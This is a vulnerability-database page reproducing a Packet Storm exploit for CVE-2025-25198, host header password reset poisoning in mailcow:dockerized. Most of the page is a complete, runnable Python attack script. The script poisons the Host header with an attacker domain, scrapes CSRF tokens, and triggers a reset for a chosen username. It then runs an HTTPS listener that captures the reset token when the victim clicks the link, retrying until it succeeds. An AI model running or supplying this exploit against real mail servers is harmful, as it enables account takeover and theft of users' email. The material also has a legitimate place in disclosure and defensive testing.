Lucene search
K

📄 mailcow: Dockerized Host Header Password Reset Poisoning

🗓️ 16 Feb 2026 00:00:00Reported by Iam Anthony Marcelo Alvarez OrellanaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 143 Views

Mailcow before 2025-01a is vulnerable to host header poisoning in password reset, enabling attacker-controlled links.

Related
Code
# Exploit Title: mailcow: dockerized < 2025-01a - Host Header Password Reset Poisoning (CVE-2025-25198)
    # Google Dork: N/A
    # Date: 2026-02-16
    # Exploit Author: Iam Alvarez (AKA Groppoxx / Maizeravla)
    # Vendor Homepage: https://mailcow.email
    # Software Link: https://github.com/mailcow/mailcow-dockerized
    # Version: < 2025-01a
    # Tested on: Ubuntu 22.04.5 LTS, Docker 26.1.3, Docker Compose 2.27.1; mailcow:dockerized 2025-01
    # CVE: CVE-2025-25198
    # PoC: https://github.com/Groppoxx/CVE-2025-25198-PoC.git
    
    # Description:
    # A flaw in mailcow’s password reset allows Host header poisoning to generate a
    # reset link pointing to an attacker-controlled domain, potentially enabling account
    # takeover if a user clicks the poisoned link. Patched in 2025-01a.
    
    # References:
    # - NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-25198
    # - Vendor advisory: https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-3mvx-qw4r-fcqf
    
    # Impact:
    # Account takeover via poisoned password reset link.
    
    # Usage (authorized testing only):
    #   sudo python3 cve_2025_25198.py \
    #     --listen-host 0.0.0.0 \
    #     --base-url https://mail.target.tld \
    #     --username [email protected] \
    #     --attacker-host your.ip.or.dns \
    #     --http2
    
    # Note: The PoC sets the Host header to the attacker-controlled domain/IP
    # to demonstrate password reset link poisoning.
    
    # Requirements:
    #   Python 3.8+ ; pip install httpx  (or 'requests' for HTTP/1.1)
    #   openssl (to generate a self-signed cert for the local HTTPS listener)
    
    # Legal:
    #   For authorized security testing only. Do NOT target live websites.
    
    from __future__ import annotations
    
    import argparse
    import http.server
    import os
    import re
    import ssl
    import subprocess
    import sys
    import threading
    from datetime import datetime, timezone
    from http import HTTPStatus
    from http.server import SimpleHTTPRequestHandler
    from typing import Optional, Dict, List, Tuple
    from urllib.parse import urlparse, parse_qs
    
    try:
        import requests
    except Exception:
        requests = None
    
    RESET = "\033[0m"
    BOLD = "\033[1m"
    DIM = "\033[2m"
    GREEN = "\033[32m"
    CYAN = "\033[36m"
    YELLOW = "\033[33m"
    MAGENTA = "\033[35m"
    
    ANSI_RE = re.compile(r'\x1b\[[0-9;]*m')
    
    def visible_len(s: str) -> int:
        return len(ANSI_RE.sub('', s))
    
    class Console:
        def __init__(self, only_final: bool = False) -> None:
            self.only_final = only_final
    
        def log(self, msg: str) -> None:
            if self.only_final:
                return
            ts = datetime.now(timezone.utc).isoformat(timespec="seconds").replace("+00:00", "Z")
            print(f"{DIM}[{ts}]{RESET} {msg}", flush=True)
    
        def banner(self, link: str, source: str = "response") -> None:
            host = urlparse(link).hostname or ""
            title = f"  {BOLD}{GREEN}RESET LINK FOUND!{RESET}  {DIM}({source}){RESET}"
            link_line = f"  {CYAN}{link}{RESET}"
            target_line = f"  Target: {BOLD}{host}{RESET}" if host else ""
            max_content = max(
                visible_len(title),
                visible_len(link_line),
                visible_len(target_line) if host else 0
            )
            inner_width = max(80, min(150, max_content))
            line = "═" * inner_width
            def box_line(content: str) -> str:
                pad = inner_width - visible_len(content)
                if pad < 0:
                    pad = 0
                return f"{MAGENTA}║{RESET}{content}{' ' * pad}{MAGENTA}║{RESET}"
            print("")
            print(f"{MAGENTA}╔{line}╗{RESET}")
            print(box_line(title))
            print(f"{MAGENTA}╟{line}╢{RESET}")
            print(box_line(link_line))
            if host:
                print(box_line(target_line))
            print(f"{MAGENTA}╚{line}╝{RESET}")
            print("")
    
    console = Console(False)
    
    RGX_TOKEN_IN_URL = re.compile(r'reset-password\?token=([^\s"&\'<>]+)', re.I)
    RGX_TOKEN_FALLBACK = re.compile(r'\b([a-f0-9]{4,12}(?:-[a-f0-9]{4,12}){3,6})\b', re.I)
    
    def links_from_text(html: str, base_url: str) -> List[str]:
        if not html:
            return []
        out: List[str] = []
        for m in RGX_TOKEN_IN_URL.finditer(html):
            out.append(f"{base_url.rstrip('/')}/reset-password?token={m.group(1)}")
        for m in RGX_TOKEN_FALLBACK.finditer(html):
            cand = f"{base_url.rstrip('/')}/reset-password?token={m.group(1)}"
            if cand not in out:
                out.append(cand)
        return out
    
    def links_from_headers(headers: Dict[str, str], base_url: str) -> List[str]:
        loc = headers.get("Location") or headers.get("location")
        return links_from_text(loc, base_url) if loc else []
    
    class ListenerState:
        def __init__(self) -> None:
            self.event = threading.Event()
            self.last_link: Optional[str] = None
    
    class LoggingHTTPSHandler(SimpleHTTPRequestHandler):
        server_version = "PoisonedHostTest/host-only"
        error_content_type = "text/plain"
    
        def log_message(self, *_: object) -> None:
            return
    
        def _record(self, code: int) -> None:
            parsed = urlparse(self.path)
            token = parse_qs(parsed.query).get("token") or []
            if token:
                link = f"{self.server.target_base_url.rstrip('/')}/reset-password?token={token[0]}"
                self.server.state.last_link = link
                self.server.state.event.set()
            if not console.only_final:
                console.log(f"{YELLOW}[HIT]{RESET} {self.command} {self.path} ← {self.client_address[0]} [{code}]")
    
        def do_GET(self) -> None:
            if self.path.startswith("/favicon"):
                self.send_response(HTTPStatus.NO_CONTENT); self.end_headers(); return
            self.send_response(HTTPStatus.OK)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            self.end_headers()
            token = parse_qs(urlparse(self.path).query).get("token", [""])[0]
            body = f"<!doctype html><meta charset=utf-8><title>OK</title><p>token: <b>{token}</b></p>"
            self.wfile.write(body.encode("utf-8"))
            self._record(HTTPStatus.OK)
    
        def do_POST(self) -> None:
            _ = self.rfile.read(int(self.headers.get("Content-Length", "0") or 0))
            self.send_response(HTTPStatus.NO_CONTENT); self.end_headers()
            self._record(HTTPStatus.NO_CONTENT)
    
    def ensure_self_signed(cert_file: str, key_file: str, cn: str = "localhost", days: int = 365) -> None:
        if os.path.exists(cert_file) and os.path.exists(key_file):
            return
        console.log("[+] Generating self-signed certificate…")
        subprocess.run([
            "openssl", "req", "-x509", "-newkey", "rsa:2048",
            "-keyout", key_file, "-out", cert_file, "-days", str(days),
            "-nodes", "-subj", f"/CN={cn}"
        ], check=True)
    
    def require_root_for_privileged_port(port: int) -> None:
        if port < 1024:
            # POSIX check: require root if binding <1024
            if hasattr(os, "geteuid"):
                if os.geteuid() != 0:
                    print("[-] Port 443 requires root. Re-run with sudo.", file=sys.stderr)
                    sys.exit(2)
            # On non-POSIX (e.g., Windows) we don't enforce sudo.
    
    def start_https_listener(host: str, port: int, cert: str, key: str, base_url: str, state: ListenerState):
        ensure_self_signed(cert, key)
        httpd = http.server.ThreadingHTTPServer((host, port), LoggingHTTPSHandler)
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        ctx.load_cert_chain(certfile=cert, keyfile=key)
        httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
        httpd.target_base_url = base_url
        httpd.state = state
        threading.Thread(target=httpd.serve_forever, name="https-listener", daemon=True).start()
        console.log(f"[+] HTTPS listener on https://{host}:{port}")
        return httpd
    
    def add_cookie_string_to_session(session, cookie_header: Optional[str], base_url: str) -> None:
        if not cookie_header:
            return
        host = urlparse(base_url).hostname
        for part in re.split(r';\s*|,\s*', cookie_header.strip()):
            if not part or "=" not in part:
                continue
            name, val = part.split("=", 1)
            try:
                session.cookies.set(name.strip(), val.strip(), domain=host)
            except Exception:
                pass
    
    class HttpClient:
        def __init__(self, base_url: str, use_http2: bool, cookie_header: Optional[str]) -> None:
            self.base_url = base_url.rstrip("/")
            self.use_http2 = use_http2
            if use_http2:
                try:
                    import httpx
                except Exception as e:
                    raise RuntimeError("Install httpx for --http2:  pip install httpx") from e
                # TLS verification disabled intentionally for testing environments
                self.session = httpx.Client(http2=True, verify=False, timeout=20.0, follow_redirects=False)
            else:
                if requests is None:
                    raise RuntimeError("Missing 'requests' for HTTP/1.1.")
                self.session = requests.Session()
            add_cookie_string_to_session(self.session, cookie_header, self.base_url)
    
        def get(self, url: str, headers: Dict[str, str], allow_redirects: bool):
            if self.use_http2:
                return self.session.get(url, headers=headers or {}, follow_redirects=allow_redirects)
            # requests: disable TLS verification explicitly
            return self.session.get(url, headers=headers or {}, verify=False, timeout=20, allow_redirects=allow_redirects)
    
        def post(self, url: str, headers: Dict[str, str], data: Dict[str, str], allow_redirects: bool):
            if self.use_http2:
                return self.session.post(url, headers=headers or {}, data=data or {}, follow_redirects=allow_redirects)
            return self.session.post(url, headers=headers or {}, data=data or {}, verify=False, timeout=20, allow_redirects=allow_redirects)
    
    RGX_INPUTS = [
        re.compile(r'name=["\']csrf_token["\']\s+value=["\']([0-9a-zA-Z_\-./+=:]+)["\']'),
        re.compile(r'name=["\']_csrf["\']\s+value=["\']([^"\']+)["\']'),
        re.compile(r'name=["\']csrf["\']\s+value=["\']([^"\']+)["\']'),
        re.compile(r'name=["\']csrf_token_reset["\']\s+value=["\']([^"\']+)["\']'),
    ]
    RGX_META = re.compile(r'<meta\s+name=["\']csrf-token["\']\s+content=["\']([^"\']+)["\']', re.I)
    RGX_JS = [
        re.compile(r'csrf_token\s*[:=]\s*["\']([^"\']+)["\']', re.I),
        re.compile(r'window\.\w*csrf\w*\s*=\s*["\']([^"\']+)["\']', re.I),
    ]
    COOKIE_CSRF = ["csrf_token", "_csrf", "XSRF-TOKEN", "CSRF-TOKEN"]
    HEX64 = re.compile(r'^[0-9a-f]{64}$', re.I)
    
    def _csrf_candidates_html(html: str) -> List[str]:
        if not html:
            return []
        cands: List[str] = []
        for rgx in RGX_INPUTS:
            m = rgx.search(html)
            if m: cands.append(m.group(1))
        m = RGX_META.search(html)
        if m: cands.append(m.group(1))
        for rgx in RGX_JS:
            m = rgx.search(html)
            if m: cands.append(m.group(1))
        for m in re.finditer(r'csrf_token=([0-9a-zA-Z_\-./+=:]{16,})', html):
            cands.append(m.group(1))
        seen: set[str] = set()
        out: List[str] = []
        for v in cands:
            if v not in seen:
                seen.add(v); out.append(v)
        return out
    
    def _csrf_from_set_cookie(headers: Dict[str, str]) -> Optional[str]:
        sc = headers.get("Set-Cookie") or headers.get("set-cookie")
        if not sc: return None
        for cookie in re.split(r',(?=\s*\w+=)', sc):
            for name in COOKIE_CSRF:
                m = re.search(rf'\b{name}=([^;,\s]+)', cookie, re.I)
                if m: return m.group(1)
        return None
    
    def _best_csrf(candidates: List[str]) -> Optional[str]:
        if not candidates: return None
        for c in candidates:
            if HEX64.fullmatch(c): return c
        return candidates[0]
    
    def nav_headers(base_url: str, attacker_host: str) -> Dict[str, str]:
        return {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate, br",
            "Upgrade-Insecure-Requests": "1",
            "Sec-Fetch-Dest": "document",
            "Sec-Fetch-Mode": "navigate",
            "Sec-Fetch-Site": "same-origin",
            "Sec-Fetch-User": "?1",
            "Te": "trailers",
            "Referer": base_url.rstrip("/") + "/",
            "Origin": base_url,
            "Host": attacker_host,
        }
    
    def fetch_csrf_auto(client: HttpClient, base_url: str, attacker_host: str, username: str) -> str:
        paths = ["", "/", "/index.php", "/reset-password", "/login", "/auth", "/user/reset"]
        h1 = nav_headers(base_url, attacker_host)
        for p in paths:
            url = client.base_url + p
            try:
                r = client.get(url, headers=h1, allow_redirects=True)
                text = r.text if hasattr(r, "text") else r.content.decode("utf-8", "ignore")
                headers = dict(getattr(r, "headers", {}))
                token = _csrf_from_set_cookie(headers) or _best_csrf(_csrf_candidates_html(text))
                if token: return token
            except Exception as e:
                console.log(f"[!] CSRF GET failed at {url}: {e}")
        h2 = dict(h1); h2.pop("Host", None)
        for p in paths:
            url = client.base_url + p
            try:
                r = client.get(url, headers=h2, allow_redirects=True)
                text = r.text if hasattr(r, "text") else r.content.decode("utf-8", "ignore")
                headers = dict(getattr(r, "headers", {}))
                token = _csrf_from_set_cookie(headers) or _best_csrf(_csrf_candidates_html(text))
                if token: return token
            except Exception as e:
                console.log(f"[!] CSRF GET (no Host) failed at {url}: {e}")
        pre_headers = {
            "User-Agent": h1["User-Agent"], "Accept": h1["Accept"], "Accept-Language": h1["Accept-Language"],
            "Content-Type": "application/x-www-form-urlencoded", "Host": attacker_host,
            "Referer": base_url.rstrip("/") + "/", "Origin": base_url, "Upgrade-Insecure-Requests": "1",
        }
        try:
            r = client.post(client.base_url + "/reset-password", headers=pre_headers,
                            data={"username": username, "pw_reset_request": "", "csrf_token": ""}, allow_redirects=True)
            text = r.text if hasattr(r, "text") else r.content.decode("utf-8", "ignore")
            headers = dict(getattr(r, "headers", {}))
            token = _csrf_from_set_cookie(headers) or _best_csrf(_csrf_candidates_html(text))
            if token: return token
        except Exception as e:
            console.log(f"[!] Preflight POST for CSRF failed: {e}")
        raise RuntimeError("Unable to auto-extract csrf_token.")
    
    def looks_like_csrf_error(body: str, status: int) -> bool:
        if status in (400, 403): return True
        text = (body or "").lower()
        return any(k in text for k in ("csrf", "invalid token", "expired token", "forgery", "bad token"))
    
    def run_sequence(client: HttpClient, base_url: str, username: str, csrf: str,
                    attacker_host: str) -> Tuple[Optional[str], Dict[str, object], str]:
        ua = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
        headers = {
            "User-Agent": ua,
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.5",
            "Content-Type": "application/x-www-form-urlencoded",
            "Host": attacker_host,
            "Referer": base_url.rstrip('/') + "/",
            "Origin": base_url,
            "Upgrade-Insecure-Requests": "1",
        }
        r1 = client.get(base_url, headers=headers, allow_redirects=True)
        body1 = r1.text if hasattr(r1, "text") else r1.content.decode("utf-8", "ignore")
        reset_ep = base_url.rstrip("/") + "/reset-password"
        payload = {"username": username, "pw_reset_request": "", "csrf_token": csrf}
        r2 = client.post(reset_ep, headers=headers, data=payload, allow_redirects=False)
        body2 = r2.text if hasattr(r2, "text") else r2.content.decode("utf-8", "ignore")
        r3 = client.get(base_url.rstrip("/") + "/", headers=headers, allow_redirects=False)
        body3 = r3.text if hasattr(r3, "text") else r3.content.decode("utf-8", "ignore")
        found: List[str] = []
        found += links_from_headers(dict(getattr(r1, "headers", {})), base_url)
        found += links_from_headers(dict(getattr(r2, "headers", {})), base_url)
        found += links_from_headers(dict(getattr(r3, "headers", {})), base_url)
        found += links_from_text(body1, base_url)
        found += links_from_text(body2, base_url)
        found += links_from_text(body3, base_url)
        seen: set[str] = set()
        clean = [l for l in found if not (l in seen or seen.add(l))]
        summary = {
            "get1": getattr(r1, "status_code", None),
            "post": getattr(r2, "status_code", None),
            "get2": getattr(r3, "status_code", None),
            "links_found": clean,
        }
        return (clean[0] if clean else None), summary, body2
    
    def attempt_once(base_url: str, username: str, attacker_host: str,
                    use_http2: bool,
                    cookie_header: Optional[str], csrf_override: Optional[str]) -> Tuple[Optional[str], Dict[str, object]]:
        client = HttpClient(base_url, use_http2, cookie_header)
        if csrf_override:
            csrf = csrf_override
            console.log(f"[+] Using provided CSRF: {csrf[:16]}…")
        else:
            csrf = fetch_csrf_auto(client, base_url, attacker_host, username)
            console.log(f"[+] Auto CSRF: {csrf[:16]}…")
        console.log("[>] Sending sequence with poisoned Host")
        link, summary, post_body = run_sequence(client, base_url, username, csrf, attacker_host)
        if not link:
            post_status = int(summary.get("post") or 0)
            if not csrf_override and looks_like_csrf_error(post_body, post_status):
                console.log("[!] CSRF invalid/expired. Rotating session and retrying once…")
                client = HttpClient(base_url, use_http2, None)
                csrf2 = fetch_csrf_auto(client, base_url, attacker_host, username)
                console.log(f"[+] Auto CSRF (retry): {csrf2[:16]}…")
                link, summary, _ = run_sequence(client, base_url, username, csrf2, attacker_host)
        return link, summary
    
    def run_until_success(listen_host: str, base_url: str, username: str,
                        attacker_host: str, use_http2: bool,
                        interval: float, max_attempts: int,
                        cookie_header: Optional[str], csrf_override: Optional[str]) -> Optional[str]:
        # Force port 443 and require sudo/root on POSIX
        listen_port = 443
        require_root_for_privileged_port(listen_port)
    
        state = ListenerState()
        srv = start_https_listener(listen_host, listen_port, "server.pem", "server.key", base_url, state)
        try:
            attempt = 0
            while True:
                attempt += 1
                if max_attempts and attempt > max_attempts:
                    console.log("[i] Reached --max-attempts without success.")
                    return None
                try:
                    link, _summary = attempt_once(base_url, username, attacker_host, use_http2, cookie_header, csrf_override)
                except Exception as e:
                    console.log(f"[!] Attempt #{attempt} error: {e}")
                    link = None
                if link:
                    console.banner(link, source="response")
                    return link
                if state.event.wait(timeout=interval):
                    link = state.last_link
                    if link:
                        console.banner(link, source="listener")
                    return link
                console.log(f"[i] Attempt #{attempt} yielded no link. Retrying in {int(interval)}s…")
        except KeyboardInterrupt:
            console.log("[+] Aborted by user.")
            return None
        finally:
            try: srv.shutdown()
            except Exception: pass
    
    def main() -> None:
        p = argparse.ArgumentParser(
            description="Host header poisoning tester (Mailcow CVE-2025-25198) — HTTPS listener on port 443 (requires sudo/root), auto-cookie + auto-CSRF (or --csrf), retry, Host-only"
        )
        p.add_argument("--listen-host", required=True)
        p.add_argument("--base-url", required=True)
        p.add_argument("--username", required=True)
        p.add_argument("--attacker-host", required=True)
        p.add_argument("--http2", action="store_true", help="Use HTTP/2 (recommended)")
        p.add_argument("--interval", type=float, default=8.0, help="Seconds between attempts and click wait window")
        p.add_argument("--max-attempts", type=int, default=0, help="0=infinite; >0 limits attempts")
        p.add_argument("--cookie", default=None, help="(Optional) inject cookies, e.g., PHPSESSID=...")
        p.add_argument("--csrf", default=None, help="(Optional) provide csrf_token explicitly (auto if omitted)")
        p.add_argument("--only-final", action="store_true", help="Hide progress; print only the final link banner")
    
        args = p.parse_args()
        global console
        console = Console(only_final=args.only_final)
        if not args.http2 and requests is None:
            console.log("[!] Install 'requests' or use --http2 with 'httpx'."); sys.exit(2)
        if not args.http2:
            console.log("[i] Running over HTTP/1.1 (requests). For best parity, use --http2.")
    
        link = run_until_success(
            listen_host=args.listen_host,
            base_url=args.base_url,
            username=args.username,
            attacker_host=args.attacker_host,
            use_http2=args.http2,
            interval=args.interval,
            max_attempts=args.max_attempts,
            cookie_header=args.cookie,
            csrf_override=args.csrf,
        )
        if link:
            if not args.only_final:
                print(f"{BOLD}{GREEN}Success:{RESET} reset link obtained. Exiting.")
        else:
            if not args.only_final:
                print("[i] No success (attempts exhausted or aborted).")
    
    if __name__ == "__main__":
        main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.17.1 - 8.8
EPSS0.05808
SSVC
143